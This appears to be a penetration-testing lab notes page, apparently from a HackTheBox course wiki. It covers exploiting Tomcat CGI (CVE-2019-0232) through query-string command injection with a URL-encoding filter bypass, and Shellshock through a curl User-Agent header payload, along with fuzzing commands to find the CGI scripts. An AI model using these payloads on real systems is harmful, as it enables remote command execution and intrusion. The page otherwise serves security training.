Tomcat CGI

CVE-2019-0232

Tomcat CGI vulnerable versions to Remote Command execution

9.0.0.M1
9.0.17
8.5.0
8.5.39
7.0.0
7.0.9

Steps to reproduce

Use nmap to enumerate specific versions are running on the server
Find the CGI-Script:
1. http://10.129.204.227:8080/cgi/FUZZ.cmd
2. http://10.129.204.227:8080/cgi/FUZZ.bat
Execute the command: http://10.129.204.227:8080/cgi/welcome.bat?&<command>

💡

Apache Tomcat introduced a patch that utilises a regular expression to prevent the use of special characters. However, the filter can be bypassed by URL-encoding the payload.

Shellshock via CGI

It is a security flaw in the Bash shell (GNU Bash up until version 4.3)

Check if is vulnerable

$ env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"

#Find the file
Intrusionz3r0@htb[/htb]$ ffuf -c -t 400 -w /usr/share/dirb/wordlists/common.txt  -u http://10.129.205.27/cgi-bin/FUZZ.cgi
#Exploit vulnerability
Intrusionz3r0@htb[/htb]$ curl -H 'User-Agent: () { :; }; echo; COMMAND-HERE' bash -s :'' http://10.129.205.27/cgi-bin/access.cgi

PreviousDrupal NextosTicket

Last updated 10 months ago